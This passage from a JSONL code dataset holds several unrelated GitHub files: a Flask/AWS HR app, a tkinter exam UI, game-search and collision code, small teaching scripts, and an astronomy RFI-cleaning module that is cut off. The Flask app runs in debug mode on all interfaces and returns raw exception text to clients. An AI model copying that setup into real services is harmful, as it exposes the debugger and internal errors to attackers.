'POST'])\r\ndef markAttProcess():\r\n emp_id = request.form['employee_id']\r\n status = request.form['status']\r\n \r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n #update_sql = \"UPDATE attendance SET Status=%s, Time_Stamp=SYSDATE() WHERE Employee_ID=%s\"\r\n insert_sql = \"INSERT INTO attendance VALUES (%s,SYSDATE(), %s)\"\r\n\r\n cursor.execute(insert_sql, (emp_id, status))\r\n db_conn.commit()\r\n cursor.close()\r\n\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute('SELECT * FROM attendance')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('attendance.html', rows=rows)\r\n\r\n#Leave Application\r\n@app.route(\"/leaveApp\")\r\ndef leaveApp():\r\n\r\n return render_template('leaveApp.html')\r\n\r\n@app.route(\"/leaveAppProcess\", methods=['GET', 'POST'])\r\ndef leaveAppProcess():\r\n emp_id = request.form['employee_id']\r\n date = request.form['leave_date']\r\n reason = request.form['reason']\r\n days = request.form['days']\r\n\r\n mc = request.files['mc_evidence']\r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n insert_sql = \"INSERT INTO leave_application (Employee_ID, Submission_Date, Reason_of_Leave, Total_Day) VALUES (%s, %s, %s, %s)\"\r\n\r\n \r\n if mc.filename == \"\":\r\n return \"Please select a file\"\r\n\r\n try:\r\n \r\n cursor.execute(insert_sql, (emp_id, date, reason, days))\r\n db_conn.commit()\r\n # Uplaod image file in S3 #\r\n mc_file_name_in_s3 = \"emp-id-\" + str(emp_id) + \"_image_file\"\r\n s3 = boto3.resource('s3')\r\n\r\n try:\r\n print(\"Data inserted in MySQL RDS... uploading image to S3...\")\r\n s3.Bucket(custombucket).put_object(Key=mc_file_name_in_s3, Body=mc)\r\n bucket_location = boto3.client('s3').get_bucket_location(Bucket=custombucket)\r\n s3_location = (bucket_location['LocationConstraint'])\r\n\r\n if s3_location is None:\r\n s3_location = ''\r\n else:\r\n s3_location = '-' + s3_location\r\n\r\n object_url = \"https://s3{0}.amazonaws.com/{1}/{2}\".format(\r\n s3_location,\r\n custombucket,\r\n mc_file_name_in_s3)\r\n\r\n except Exception as e:\r\n return str(e)\r\n\r\n finally:\r\n cursor.close()\r\n\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute('SELECT * FROM leave_application')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('leave.html', rows=rows)\r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0', port=80, debug=True)","repo_name":"elissammi/aws-empMgr","sub_path":"mlunaApp.py","file_name":"mlunaApp.py","file_ext":"py","file_size_in_byte":7739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15565202838","text":"import tkinter as tk\nfrom tkinter import ttk\nimport ui_subject as uisub\nimport ui_staff as uistaff\nimport ui_invigilator as uiinv\nimport ui_examhall as uiexamhall\nimport ui_exam as uiexam\nimport ui_class as uiclass\nimport ui_examinstance as uiexaminstance\nimport uiabstract\n\n\nclass HomeUI(uiabstract.ParentUI):\n def __init__(self, *args, **kwargs):\n uiabstract.ParentUI.__init__(self, *args, **kwargs)\n # child UI definitions\n self.update_UI = None\n\n\n self.mainLabel = ttk.Label(self.container, text=\"Please select a collection\")\n\n # button constants\n self.BTNSUBKEY = 0\n self.BTNSTAFFKEY = 1\n self.BTNINVIGILATORKEY = 2\n self.BTNEXAMHALLKEY = 3\n self.BTNEXAMKEY = 4\n self.BTNCLASSKEY = 5\n self.BTNEXAMINSTANCEKEY = 6\n\n # buttons\n self.btn_subject = ttk.Button(self.container, text=\"Subjects\", command=lambda: self.btn_handler(self.BTNSUBKEY))\n self.btn_staff = ttk.Button(self.container, text=\"Staffs\", command=lambda: self.btn_handler(self.BTNSTAFFKEY))\n self.btn_invigilator = ttk.Button(self.container, text=\"Invigilators\",\n command=lambda: self.btn_handler(self.BTNINVIGILATORKEY))\n self.btn_examhall = ttk.Button(self.container, text=\"Examhalls\",\n command=lambda: self.btn_handler(self.BTNEXAMHALLKEY))\n self.btn_exam = ttk.Button(self.container, text=\"Exams\", command=lambda: self.btn_handler(self.BTNEXAMKEY))\n self.btn_class = ttk.Button(self.container, text=\"Classes\", command=lambda: self.btn_handler(self.BTNCLASSKEY))\n self.btn_examinstance = ttk.Button(self.container, text=\"Exam instances\",\n command=lambda: self.btn_handler(self.BTNEXAMINSTANCEKEY))\n\n # layout\n self.mainLabel.grid(row=0, columnspan=3)\n self.btn_subject.grid(row=1)\n self.btn_staff.grid(row=1, column=1)\n self.btn_invigilator.grid(row=1, column=2)\n self.btn_examhall.grid(row=2)\n self.btn_exam.grid(row=2, column=1)\n self.btn_class.grid(row=2, column=2)\n self.btn_examinstance.grid(row=3)\n\n # padding configuration\n for child in self.container.winfo_children():\n child.grid_configure(padx=10, pady=20)\n\n # click event handlers\n\n def btn_handler(self, key):\n if key == self.BTNSUBKEY:\n self.update_UI = uisub.DisplayUpdateSubjectUI()\n elif key == self.BTNEXAMINSTANCEKEY:\n self.update_UI = uiexaminstance.DisplayUpdateExaminstanceUI()\n elif key == self.BTNCLASSKEY:\n self.update_UI = uiclass.DisplayUpdateClassUI()\n elif key == self.BTNEXAMKEY:\n self.update_UI = uiexam.DisplayUpdateExamUI()\n elif key == self.BTNEXAMHALLKEY:\n self.update_UI = uiexamhall.DisplayUpdateExamhallUI()\n elif key == self.BTNINVIGILATORKEY:\n self.update_UI = uiinv.DisplayUpdateInvigilatorUI()\n elif key == self.BTNSTAFFKEY:\n self.update_UI = uistaff.DisplayUpdateStaffUI()\n\n\n\n\n","repo_name":"peaceofmind123/invigilators","sub_path":"code/homeui.py","file_name":"homeui.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9219898963","text":"from copy import deepcopy\n\nxlim, ylim = 3, 2 # board dimensions\n\nclass GameState:\n \"\"\"\n Attributes\n ----------\n _board: list(list)\n Represent the board with a 2d array _board[x][y]\n where open spaces are 0 and closed spaces are 1\n \n _parity: bool\n Keep track of active player initiative (which\n player has control to move) where 0 indicates that\n player one has initiative and 1 indicates player 2\n \n _player_locations: list(tuple)\n Keep track of the current location of each player\n on the board where position is encoded by the\n board indices of their last move, e.g., [(0, 0), (1, 0)]\n means player 1 is at (0, 0) and player 2 is at (1, 0)\n \n \"\"\"\n\n def __init__(self):\n self._board = [[0] * ylim for _ in range(xlim)]\n self._board[-1][-1] = 1 # block lower-right corner\n self._parity = 0\n self._player_locations = [None, None]\n\n def forecast_move(self, move):\n \"\"\" Return a new board object with the specified move\n applied to the current game state.\n \n Parameters\n ----------\n move: tuple\n The target position for the active player's next move\n \"\"\"\n if move not in self.get_legal_moves():\n raise RuntimeError(\"Attempted forecast of illegal move\")\n newBoard = deepcopy(self)\n newBoard._board[move[0]][move[1]] = 1\n newBoard._player_locations[self._parity] = move\n newBoard._parity ^= 1\n return newBoard\n\n def get_legal_moves(self):\n \"\"\" Return a list of all legal moves available to the\n active player. Each player should get a list of all\n empty spaces on the board on their first move, and\n otherwise they should get a list of all open spaces\n in a straight line along any row, column or diagonal\n from their current position. (Players CANNOT move\n through obstacles or blocked squares.) Moves should\n be a pair of integers in (column, row) order specifying\n the zero-indexed coordinates on the board.\n \"\"\"\n loc = self._player_locations[self._parity]\n if not loc:\n return self._get_blank_spaces()\n moves = []\n rays = [(1, 0), (1, -1), (0, -1), (-1, -1),\n (-1, 0), (-1, 1), (0, 1), (1, 1)]\n for dx, dy in rays:\n _x, _y = loc\n while 0 <= _x + dx < xlim and 0 <= _y + dy < ylim:\n _x, _y = _x + dx, _y + dy\n if self._board[_x][_y]:\n break\n moves.append((_x, _y))\n return moves\n\n def _get_blank_spaces(self):\n \"\"\" Return a list of blank spaces on the board.\"\"\"\n return [(x, y) for y in range(ylim) for x in range(xlim)\n if self._board[x][y] == 0]\n","repo_name":"bhupendpatil/Practice","sub_path":"Artificial Intelligence/Search and Optimization/Introduction to Game Playing/gamestate.py","file_name":"gamestate.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"9868137856","text":"# Подсчитать, сколько было выделено памяти под переменные в ранее разработанных программах в рамках первых трех уроков.\n# Проанализировать результат и определить программы с наиболее эффективным использованием памяти.\n\n# Задача: Вводятся три разных числа. Найти, какое из них является средним (больше одного, но меньше другого).\n\nimport sys\n\n\ndef show_size(x, level=0):\n print('\\t' * level, f'type = {x.__class__}, size = {sys.getsizeof(x)}, object = {x}')\n\n\np = 'Введите три числа:'\nprint(p)\nshow_size(p)\n# type = , size = 74, object = Введите три числа:\n\na = int(input(\"a = \"))\nshow_size(a)\n# type = , size = 14, object = 5\n\nb = int(input(\"b = \"))\nshow_size(b)\n# type = , size = 14, object = 6\n\nc = int(input(\"c = \"))\nshow_size(c)\n# type = , size = 14, object = 7\n\nm = 'Среднее:'\nshow_size(m)\n# type = , size = 54, object = Среднее:\n\nif (b < a < c) or (c < a < b):\n print(m, a)\nelif (a < b < c) or (c < b < a):\n print(m, b)\nelse:\n print(m, c)\n\nshow_size((sys.getsizeof(p) + sys.getsizeof(a) + sys.getsizeof(b)+ sys.getsizeof(c) + sys.getsizeof(m)))\n# type = , size = 14, object = 170\n","repo_name":"NikolaySibekin/algorithms_lesson6","sub_path":"task_1_1.py","file_name":"task_1_1.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70366415930","text":"from threading import Thread\nfrom socket import *\n\nlist_escolas=[\"Imperatriz Leopoldinense\",\"Estação Primeira de Mangueira\",\"Acadêmicos do Salgueiro\",\"São Clemente\",\"Unidos do Viradouro\",\"Beija-Flor de Nilópolis\",\n\"Paraíso do Tuiuti\",\"Portela\",\"Mocidade Independente de Padre Miguel\",\"Unidos da Tijuca\",\"Acadêmicos do Grande Rio\",\"Unidos de Vila Isabel\"]\n\n\n \n\ndef atende (conn, cliente):\n while True:\n data = conn.recv (8192)\n print(data)\n if not data or len(data) == 0:\n break\n\n print (str(cliente)+\"recebeu mensagem \"+data.decode(\"utf-8\") )\n \n \n \n # conn.send (str.encode (\"Eu sei que voce me mandou \"+data.decode(\"utf-8\") , \"UTF-8\"))\n\n print (\"Fim da conexao com \"+str(cliente))\n\n conn.close\n \n\ns = socket ()\n\nhost = \"0.0.0.0\"\nporta = 8192\ns.bind ((host, porta))\ns.listen (10)\nnthr = 0\n\nwhile True:\n print(\"Aguarde conexão de um cliente\")\n (conn, cliente) = s.accept ()\n","repo_name":"jiaxingc/client_server","sub_path":"servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41621226101","text":"import pytiled_parser\n\nimport serialize\nfrom gametree import Component, Vector2f, Vector2\nimport environ\nimport utils\nimport numpy as np\nimport math\nfrom typing import Optional\nimport sys\n\nfrom shapely import speedups # type: ignore\nfrom shapely.geometry import Polygon, Point # type: ignore\nfrom shapely.ops import nearest_points\n\n_PRECISION = 2\nCOLLIDER_DRAW_COLOR = (76, 40, 130, 127)\n\nspeedups.enable()\n\n\nclass Collider(Component):\n colliders = serialize.Unserialized()\n _transformed_colliders = serialize.Unserialized()\n _transformed_collider_polygons = serialize.Unserialized()\n _transformed_updated = serialize.Unserialized()\n\n def __init__(self):\n super().__init__()\n self.colliders: Optional[list] = None\n\n self._transformed_colliders: Optional[list] = None\n self._transformed_collider_polygons: Optional[list[Polygon]] = None\n self._transformed_updated: int = -1\n self.solid: bool = True\n\n def init_unserialized(self, deserializer):\n super().init_unserialized(deserializer)\n self._init_unserialized_called = True\n self._transformed_colliders = None\n self._transformed_collider_polygons = None\n self._transformed_updated = -1\n\n def duplicate(self, new_entity):\n new_component = self.__class__()\n new_component.colliders = self.colliders\n new_component.solid = self.solid\n return new_component\n\n def test_intersection(self, other) -> bool:\n if self.colliders is None:\n return False\n try:\n for left_c, left_p in zip(self.transformed_colliders, self.transformed_collider_polygons):\n for right in other.get_pcolliders(left_c):\n if are_polygons_intersecting(left_p, right):\n return True\n except TypeError as e:\n sys.stderr.write(str(e) + \"\\n\")\n return False\n\n def _update_transformed_colliders(self):\n if self._transformed_updated < self.entity.transform_modified:\n self._transformed_colliders = None\n self._transformed_collider_polygons = None\n\n if self._transformed_colliders is None:\n self._transformed_colliders = [self.entity.transform.transform_points(c) for c in self.colliders]\n self._transformed_collider_polygons = [\n Polygon(c) for c in self._transformed_colliders]\n self._transformed_updated = environ.game.get_modification_stamp()\n\n @property\n def transformed_colliders(self) -> Optional[list]:\n self._update_transformed_colliders()\n return self._transformed_colliders\n\n @property\n def transformed_collider_polygons(self) -> Optional[list]:\n self._update_transformed_colliders()\n return self._transformed_collider_polygons\n\n def minimum_translation_vector(self, other) -> Optional[Vector2]:\n ret = Vector2f()\n for left in self.colliders:\n left_t = self.entity.transform.transform_points(left)\n for right in other.get_colliders(left_t):\n right_t = other.entity.transform.transform_points(right)\n mtv = minimum_translation_vector(\n left_t,\n right_t)\n if mtv is not None:\n ret += mtv\n if ret[0] == 0.0 and ret[1] == 0.0:\n return None\n return ret\n\n def get_colliders(self, other_collider) -> list:\n if self.colliders is None:\n raise RuntimeError(f\"Colliders are not set!\")\n return self.colliders\n\n def get_pcolliders(self, other_collider) -> list:\n return self.transformed_collider_polygons\n\n @environ.client_only\n def draw_colliders(self):\n for collider in self.colliders:\n points = self.entity.transform.transform_points_to_pyarcade_space(collider)\n points = [(point.x, point.y) for point in points]\n environ.arcade.draw_polygon_filled(points, COLLIDER_DRAW_COLOR)\n\n\nclass ManualCollider(Collider):\n def __init__(self, collision_data: list, solid: bool = True):\n super().__init__()\n self._colliders: list = collision_data\n self.colliders: list = collision_data\n self.solid: bool = solid\n\n def init_unserialized(self, deserializer):\n super().init_unserialized(deserializer)\n self.colliders = self._colliders\n\n def duplicate(self, new_entity):\n new_component = self.__class__(self.colliders, self.solid)\n return new_component\n\n\nclass SingleCollider(Collider):\n def __init__(self, tmx_data=None, tileset_name: str =None, relative_gid: int =None, solid: bool =None):\n \"\"\"Must provide either tmx_data or (tileset_name and relative_gid and solid).\"\"\"\n super().__init__()\n if tmx_data is not None:\n self.tileset_name, self.relative_gid = environ.game.gid_to_tile_reference(tmx_data.gid)\n self.solid: bool = tmx_data.properties.get('solid', True)\n if tileset_name is not None:\n self.tileset_name = tileset_name\n if relative_gid is not None:\n self.relative_gid = relative_gid\n if solid is not None:\n self.solid = solid\n\n self.colliders: list = make_colliders_from_tile(environ.game.get_tile_by_tile_reference(self.tileset_name, self.relative_gid))\n\n def init_unserialized(self, deserializer):\n self.colliders = make_colliders_from_tile(deserializer.context.get_tile_by_tile_reference(self.tileset_name, self.relative_gid))\n super().init_unserialized(deserializer)\n\n def duplicate(self, new_entity):\n new_component = self.__class__(tileset_name=self.tileset_name, relative_gid=self.relative_gid, solid=self.solid)\n return new_component\n\n\nclass MultiCollider(Collider):\n collider_map = serialize.Unserialized()\n\n def __init__(self):\n super().__init__()\n self.collider_map: Optional[dict] = None\n\n def duplicate(self, new_entity):\n # Collider_map is set up when the component is attached to its entity\n new_component = self.__class__()\n return new_component\n\n def on_framesets_changed(self, framesets: dict, game):\n self.collider_map = {}\n for name, frameset in framesets.items():\n t: pytiled_parser.Tile = game.find_frameset(\n frameset.frameset)\n\n if t is None:\n raise RuntimeError(f\"Frameset {frameset.frameset} does not exist in Tiled map.\")\n\n flipped_horizontally = utils.is_flipped_horizontally(self.entity.gid)\n flipped_vertically = utils.is_flipped_vertically(self.entity.gid)\n t.flipped_horizontally = flipped_horizontally != frameset.flipped_horizontally\n t.flipped_vertically = flipped_vertically != frameset.flipped_vertically\n\n addcol = make_colliders_from_tile(t)\n self.collider_map[name] = addcol\n\n t.flipped_horizontally = False\n t.flipped_vertically = False\n\n def on_frameset_changed(self, new_frameset: dict):\n self.colliders = self.collider_map.get(new_frameset, \"\")\n\n # Force a recalculation next time collision might occur\n self._transformed_colliders = None\n self._transformed_collider_polygons = None\n\n def init_unserialized(self, deserializer):\n self.colliders = None\n super().init_unserialized(deserializer)\n\n\ndef make_colliders_from_tile(tile) -> list[Optional[list[Vector2]]]:\n ret: list[Optional[list[Vector2]]] = []\n if tile.objects is None:\n return ret\n for hitbox in tile.objects.tiled_objects:\n ret.append(make_collider_from_hitbox(hitbox))\n return ret\n\n\ndef make_collider_from_hitbox(hitbox) -> Optional[list[Vector2]]:\n points = []\n if isinstance(hitbox, pytiled_parser.tiled_object.Rectangle):\n if hitbox.size is None:\n sys.stderr.write(\n \"Warning: Rectangle hitbox created for without a \"\n \"height or width Ignoring.\\n\"\n )\n return None\n\n points.append(Vector2f(hitbox.coordinates.x, hitbox.coordinates.y))\n points.append(Vector2f(hitbox.coordinates.x + hitbox.size.width, hitbox.coordinates.y))\n points.append(Vector2f(hitbox.coordinates.x + hitbox.size.width, hitbox.coordinates.y + hitbox.size.height))\n points.append(Vector2f(hitbox.coordinates.x, hitbox.coordinates.y + hitbox.size.height))\n\n elif isinstance(\n hitbox, pytiled_parser.tiled_object.Polygon\n ) or isinstance(hitbox, pytiled_parser.tiled_object.Polyline):\n for coord in hitbox.points:\n points.append(Vector2f(coord.x + hitbox.coordinates.x, coord.y + hitbox.coordinates.y))\n\n if points[0][0] == points[-1][0] and points[0][1] == points[-1][1]:\n points.pop()\n\n clockwise_counter = 0.0\n for i in range(0, len(points)):\n clockwise_counter += (points[i].x - points[i-1].x) * (points[i].y + points[i-1].y)\n if clockwise_counter > 0:\n points.reverse()\n\n elif isinstance(hitbox, pytiled_parser.tiled_object.Ellipse):\n if not hitbox.size:\n sys.stderr.write(\n f\"Warning: Ellipse hitbox created without a height \"\n f\" or width. Ignoring.\\n\"\n )\n return None\n\n hw = hitbox.size.width / 2\n hh = hitbox.size.height / 2\n cx = hitbox.coordinates.x\n cy = hitbox.coordinates.y\n\n total_steps = 8\n angles = [\n step / total_steps * 2 * math.pi for step in range(total_steps)\n ]\n for angle in angles:\n x = hw * math.cos(angle) + cx\n y = -(hh * math.sin(angle) + cy)\n points.append(Vector2f(x, y))\n elif isinstance(hitbox, pytiled_parser.tiled_object.Point):\n return None\n else:\n sys.stderr.write(f\"Warning: Hitbox type {type(hitbox)} not supported.\\n\")\n return None\n\n return points\n\n\ndef make_shapely_polygons(poly_a, poly_b) -> tuple:\n return Polygon(poly_a), Polygon(poly_b)\n\n\ndef are_polygons_intersecting(poly_a, poly_b) -> bool:\n r2 = False\n r1 = poly_a.intersects(poly_b)\n if r1:\n r2 = poly_a.touches(poly_b)\n return r1 and not r2\n\n\ndef minimum_translation_vector(poly_a, poly_b) -> Optional[Vector2]:\n \"\"\"\n If the polygons do not intersect, return None.\n If the polygons do intersect, return the minimum translation\n vector for poly_a. (That is, the translation vector to apply to\n poly_a such that it no longer intersects with poly_b.\n \"\"\"\n\n diff = minkowski_difference(poly_a, poly_b)\n minkowski_intersecting = is_point_in_polygon(0, 0, diff)\n\n if minkowski_intersecting:\n sdiff = Polygon(diff)\n npts = nearest_points(sdiff.exterior, Point(0, 0))\n return Vector2f(-npts[0].x, -npts[0].y)\n return None\n\n\ndef is_point_in_polygon(x: float, y: float, polygon_point_list: list) -> bool:\n\n shapely_point = Point(x, y)\n shapely_polygon = Polygon(polygon_point_list)\n\n return shapely_polygon.contains(shapely_point)\n\n\ndef _rotate_polygon_points(polygon) -> list:\n pos = 0\n for i in range(1, len(polygon)):\n if polygon[i].y < polygon[pos].y or polygon[i].y == polygon[pos].y and polygon[i].x < polygon[pos].x:\n pos = i\n\n # Rotate points:\n if pos != 0:\n return polygon[pos:] + polygon[:pos]\n return polygon[:]\n\n\ndef minkowski_sum(P: list, Q: list) -> list:\n # the first vertex must be the lowest\n P = _rotate_polygon_points(P)\n Q = _rotate_polygon_points(Q)\n\n # Ensure cyclic indexing\n P.append(P[0])\n P.append(P[1])\n Q.append(Q[0])\n Q.append(Q[1])\n\n # Run minkowski\n result = []\n i = 0\n j = 0\n while i < len(P) - 2 or j < len(Q) - 2:\n result.append(P[i] + Q[j])\n cross = np.cross(P[i + 1] - P[i], Q[j + 1] - Q[j])\n if cross >= 0: i += 1\n if cross <= 0: j += 1\n\n return result\n\n\ndef minkowski_difference(P: list, Q: list) -> list:\n return minkowski_sum(P, [q * -1 for q in Q])\n","repo_name":"google/google-ctf","sub_path":"2022/hackceler8/game/collision.py","file_name":"collision.py","file_ext":"py","file_size_in_byte":12060,"program_lang":"python","lang":"en","doc_type":"code","stars":4153,"dataset":"github-code","pt":"77"} +{"seq_id":"71018797050","text":"#! /usr/bin/env python\r\nimport os\r\nimport sys\r\nimport time\r\nimport readfil\r\nimport astropy.io.fits as pyfits\r\nimport numpy as np\r\nimport torch\r\n\r\ndef printcuda(cuda):\r\n print(\"GPU Memory Using: \",\r\n torch.cuda.memory_allocated(cuda)//(1024*1024), torch.cuda.max_memory_allocated(cuda)//(1024*1024), \r\n torch.cuda.memory_cached(cuda)//(1024*1024), torch.cuda.max_memory_cached(cuda)//(1024*1024))\r\n\r\ndef readplotini(inifile):\r\n FILENAME = []\r\n FITSFILE = []\r\n PlotReady = 0\r\n PLOTFILE = []\r\n with open(inifile,'r') as fd:\r\n all_lines = fd.readlines()\r\n for i in range(len(all_lines)):\r\n #### Skip Empty Line ####\r\n if len(all_lines[i].split()) == 0:\r\n continue\r\n #### Skip # Line ####\r\n elif \"#\" in all_lines[i].split()[0]:\r\n continue\r\n elif 'PlotReady' in all_lines[i]:\r\n PlotReady = int(all_lines[i].split()[2]) \r\n elif 'SearchPath' in all_lines[i]:\r\n SearchPath = all_lines[i].split()[2]\r\n elif 'PLOTFILE' in all_lines[i]:\r\n PLOTFILE = all_lines[i].split()[2]\r\n for root, _, files in os.walk(SearchPath):\r\n for fil in files:\r\n if fil.endswith(\".fil\"):\r\n FILENAME.append(os.path.join(root, fil))\r\n elif fil.endswith(\".fits\"):\r\n FILENAME.append(os.path.join(root, fil))\r\n return PlotReady, FILENAME, PLOTFILE\r\n\r\ndef readini(inifile):\r\n PlotTime = []\r\n Plotrange = 0\r\n PlotDM = 0.0\r\n WINDOWSIZE = 250\r\n RFITHR = 4.0\r\n IGNORE = []\r\n CHOFF_LOW = 0\r\n CHOFF_HIGH = 0\r\n THRESH = 1.0\r\n NSMAX = 1\r\n LODM = 0.0\r\n HIDM = 1.0\r\n DDM = 0.1\r\n PlotPersent = 1.0\r\n useGPU = True #False #\r\n BlockSize = 1000\r\n with open(inifile,'r') as fd:\r\n all_lines = fd.readlines()\r\n for i in range(len(all_lines)):\r\n #### Skip Empty Line ####\r\n if len(all_lines[i].split()) == 0:\r\n continue\r\n #### Skip # Line ####\r\n elif \"#\" in all_lines[i].split()[0]:\r\n continue\r\n elif 'THRESH' in all_lines[i]:\r\n THRESH = float(all_lines[i].split()[2])\r\n elif 'NSMAX' in all_lines[i]:\r\n NSMAX = int(all_lines[i].split()[2])\r\n elif 'LODM' in all_lines[i]:\r\n LODM = float(all_lines[i].split()[2])\r\n elif 'HIDM' in all_lines[i]:\r\n HIDM = float(all_lines[i].split()[2])\r\n elif 'DDM' in all_lines[i]:\r\n DDM = float(all_lines[i].split()[2])\r\n elif 'RFITHR' in all_lines[i]:\r\n RFITHR = float(all_lines[i].split()[2])\r\n elif 'IGNORE' in all_lines[i]:\r\n # IGNORE = int(all_lines[i].split()[2])\r\n for s in range(len(all_lines[i].split()) - 2):\r\n IGNORE.append(all_lines[i].split()[2+s]) \r\n elif 'WINDOWSIZE' in all_lines[i]:\r\n WINDOWSIZE = int(all_lines[i].split()[2])\r\n elif 'CHOFF_LOW' in all_lines[i]:\r\n CHOFF_LOW = int(all_lines[i].split()[2])\r\n elif 'CHOFF_HIGH' in all_lines[i]:\r\n CHOFF_HIGH = int(all_lines[i].split()[2])\r\n elif 'AVERAGE' in all_lines[i]:\r\n AVERAGE = int(all_lines[i].split()[2])\r\n elif 'FREQAVG' in all_lines[i]:\r\n FREQAVG = int(all_lines[i].split()[2])\r\n elif 'PlotTime' in all_lines[i]:\r\n for s in range(len(all_lines[i].split()) - 2):\r\n PlotTime.append(all_lines[i].split()[2+s]) \r\n elif 'Plotrange' in all_lines[i]:\r\n Plotrange = float(all_lines[i].split()[2]) \r\n elif 'PlotDM' in all_lines[i]:\r\n PlotDM = float(all_lines[i].split()[2]) \r\n elif 'PlotPersent' in all_lines[i]:\r\n PlotPersent = float(all_lines[i].split()[2]) \r\n if PlotPersent <= 0:\r\n print(\"PlotPersent can't <= 0\")\r\n exit()\r\n elif PlotPersent > 1:\r\n print(\"PlotPersent can't > 1\")\r\n exit()\r\n elif 'PlotBoxcar' in all_lines[i]:\r\n PlotBoxcar = float(all_lines[i].split()[2]) \r\n elif 'BlockSize' in all_lines[i]:\r\n BlockSize = int(all_lines[i].split()[2])\r\n elif 'useGPU' in all_lines[i]:\r\n if int(all_lines[i].split()[2]) == 0:\r\n print(\"Using CPU\")\r\n useGPU = False\r\n else:\r\n print(\"Using GPU\")\r\n useGPU = True\r\n sys.stdout.flush()\r\n \r\n if (FREQAVG == 0 or AVERAGE == 0) :\r\n print(\"AVERAGE or FREQAVG can't be Zero !!!\")\r\n exit()\r\n return (THRESH, NSMAX, LODM, HIDM, DDM, RFITHR, IGNORE, WINDOWSIZE, CHOFF_LOW, \r\n CHOFF_HIGH, PlotPersent, PlotBoxcar, PlotTime, Plotrange, PlotDM, AVERAGE, \r\n FREQAVG, useGPU, BlockSize,)\r\n\r\ndef convolve(dn, boxcar):\r\n conv = dn.copy()\r\n for i in range(1, boxcar):\r\n # conv[i:] += dn[:-i]\r\n # conv[:i] += dn[-i:]\r\n conv += np.roll(dn, i, axis = 0)\r\n return conv\r\n\r\ndef convolve_gpu(dn, boxcar):\r\n conv = dn.detach().clone()\r\n for i in range(1, boxcar):\r\n # conv[i:] += dn[:-i]\r\n # conv[:i] += dn[-i:]\r\n conv += torch.roll(dn, i, dims = 0)\r\n return conv\r\n\r\ndef mad(din, nbl, wsize):\r\n # tmp_des = np.sort(din.copy().mean(axis= 1).reshape(nbl, wsize), axis=1)\r\n # med = tmp_des[:, wsize//2].reshape(nbl, 1)\r\n # rms = np.sort(np.abs(tmp_des - med))[:, wsize//2] #\r\n # din = din.mean(axis= 1).reshape(nbl, wsize)\r\n med = np.median(din, axis=1).reshape(nbl, 1)\r\n rms = np.median(np.abs(din-med), axis=1)\r\n return med, 1.4826*rms\r\n\r\ndef mad_gpu(din, nbl, wsize):\r\n # tmp_des, _ = torch.sort(din.mean(dim= 1).view(nbl, wsize), dim=1)\r\n # med = tmp_des[:, wsize//2].view(nbl, 1)\r\n # tmp_des, _ = torch.sort(torch.abs(tmp_des - med))\r\n # rms = tmp_des[:, wsize//2] #\r\n # din = din.mean(dim= 1).view(nbl, wsize)\r\n med, _ = torch.median(din, 1)\r\n med = med.view(nbl, 1)\r\n rms, _ = torch.median(torch.abs(din-med), 1)\r\n return med, 1.4826*rms\r\n\r\ndef cleanning(din, tthresh, totalch, choff_low, choff_high, nbl, wsize, sample, ignore, plotbc):\r\n #### Remove offset channel ####\r\n nch = totalch-choff_low-choff_high\r\n data_conv = din.copy()[:, choff_high: totalch-choff_low]\r\n #### Convolve ####\r\n data_rfi = convolve(data_conv, int(plotbc))\r\n #### Ignore channels ####\r\n channel_med = np.median(data_rfi, axis=1)\r\n for i in range(len(ignore)):\r\n for s in range(5):\r\n data_rfi.transpose()[int(ignore[i])-2+s] = (\r\n np.random.normal(channel_med.mean(), np.std(channel_med), data_rfi.shape[0]))\r\n #(med_rfi.reshape(1, -1)).repeat(5, axis=0)\r\n #### Remove RFI in time ####\r\n # med_rfi = np.median(data_rfi.copy(), axis=1)\r\n med_tim = np.median(data_rfi.copy(), axis=0)\r\n # med, rms = mad(data_rfi, nbl, wsize)\r\n # sigma = ((data_rfi.copy().mean(axis = 1).reshape(nbl, wsize) - med\r\n # )/rms.reshape(nbl, 1)).reshape(-1)\r\n # # data_rfi[np.where(sigma > tthresh)] = np.random.chisquare(wsize, \r\n # # nch)/wsize*np.sqrt((med**2).mean())\r\n # data_rfi[np.where(sigma > tthresh)] = data_rfi.copy().mean(axis=0)\r\n data_time = data_rfi.copy().mean(axis= 1).reshape(nbl, wsize)\r\n med_time, rms_time = mad(data_time, nbl, wsize)\r\n sigma_time = ((data_time - med_time)/rms_time.reshape(nbl, 1)).reshape(-1)\r\n data_rfi[np.where(sigma_time > tthresh)] = med_tim\r\n\r\n #### Remove RFI in frequency ####\r\n # data_frq = data_rfi.copy().mean(axis= 0)\r\n # med_frq = np.median(data_frq)\r\n # rms_frq = np.median(np.abs(data_frq - med_frq))\r\n # sigma_frq = ((data_frq - med_frq)/rms_frq).reshape(-1)\r\n # data_rfi.transpose()[np.where(sigma_frq > tthresh)] = med_rfi\r\n # print(med_rfi.shape, data_rfi.transpose().shape, ignore)\r\n # data_rfi.transpose()[ignore] = med_rfi\r\n return data_rfi\r\n\r\ndef cleanning_gpu(din, tthresh, totalch, choff_low, choff_high, nbl, wsize, sample):\r\n #### Remove RFI in time ####\r\n nch = totalch-choff_low-choff_high\r\n data_rfi = din[:, choff_high: totalch-choff_low]\r\n # data_rfi = data_rfi - data_rfi.mean(dim = 0)\r\n # med, rms = mad_gpu(data_rfi.detach().clone(), nbl, wsize)\r\n # sigma = ((data_rfi.mean(dim = 1).view(nbl, wsize) - med\r\n # )/rms.view(nbl, 1)).view(-1)\r\n # data_rfi[torch.where(sigma > tthresh)] = 